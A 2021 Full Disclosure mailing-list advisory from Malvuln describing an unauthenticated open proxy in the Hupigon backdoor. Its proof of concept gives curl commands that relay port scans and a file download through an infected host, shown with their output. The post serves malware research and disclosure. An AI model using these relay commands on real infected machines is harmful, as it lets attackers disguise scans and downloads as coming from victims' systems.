
Date: Sat, 3 Jul 2021 17:34:39 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Hupigon.gsy / Unauthenticated Open Proxy

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/7e99aa748b61fd0802fa19cf9e4cf1f8.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Hupigon.gsy
Vulnerability: Unauthenticated Open Proxy
Description: The malware listens on TCP port 8080 and drops its executable
under Windows dir. Third-party attackers who can connect to the infected
system can relay requests from the original connection to the destination
and then back to the origination system. Attackers may then be able to
launch attacks, download files or port scan third party systems and it will
appear as the attacks originated from that infected host.
Type: PE32
MD5: 7e99aa748b61fd0802fa19cf9e4cf1f8
Vuln ID: MVID-2021-0271
Dropped files: winsed.com.cn.exe
Disclosure: 07/03/2021

Exploit/PoC:
Scan port 110)

curl  http://192.168.18.129:8080 -H "Host: 192.168.18.128:110" -v
 Rebuilt URL to: http://192.168.18.129:8080/
  Trying 192.168.18.129...
 TCP_NODELAY set
 Connected to 192.168.18.129 (192.168.18.129) port 8080 (#0)
 GET / HTTP/1.1
 Host: 192.168.18.128:110
 User-Agent: curl/7.55.1
 Accept: */*

+OK INetSim POP3 Server ready <55025.1625188304@...3host>
-ERR Unknown command.


Scan port 21)

curl  http://192.168.18.129:8080 -H "Host: 192.168.18.128:21" -v
 Rebuilt URL to: http://192.168.18.129:8080/
 Trying 192.168.18.129...
 TCP_NODELAY set
 Connected to 192.168.18.129 (192.168.18.129) port 8080 (#0)
 GET / HTTP/1.1
 Host: 192.168.18.128:21
 User-Agent: curl/7.55.1
 Accept: */*

220 INetSim FTP Service ready.
500 Unknown command.

Download filez)

curl  http://192.168.18.129:8080/DOOM.exe -H "Host: 192.168.18.128" -v
--out DOOM.exe
 Trying 192.168.18.129...

 GET /DOOM.exe HTTP/1.1
 Host: 192.168.18.128
 User-Agent: curl/7.55.1
 Accept: */*

 HTTP 1.0, assume close after body
 HTTP/1.0 200 OK
 Server: SimpleHTTP/0.6 Python/2.7.6
 Date: Fri, 02 Jul 2021 01:14:31 GMT
 Content-type: application/x-msdos-program
 Content-Length: 103533
 Last-Modified: Sat, 03 Aug 2019 04:57:12 GMT

{ [102194 bytes data]
100  101k  100  101k    0     0   101k      0  0:00:01 --:--:--  0:00:01
 717k
* Closing connection 0


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
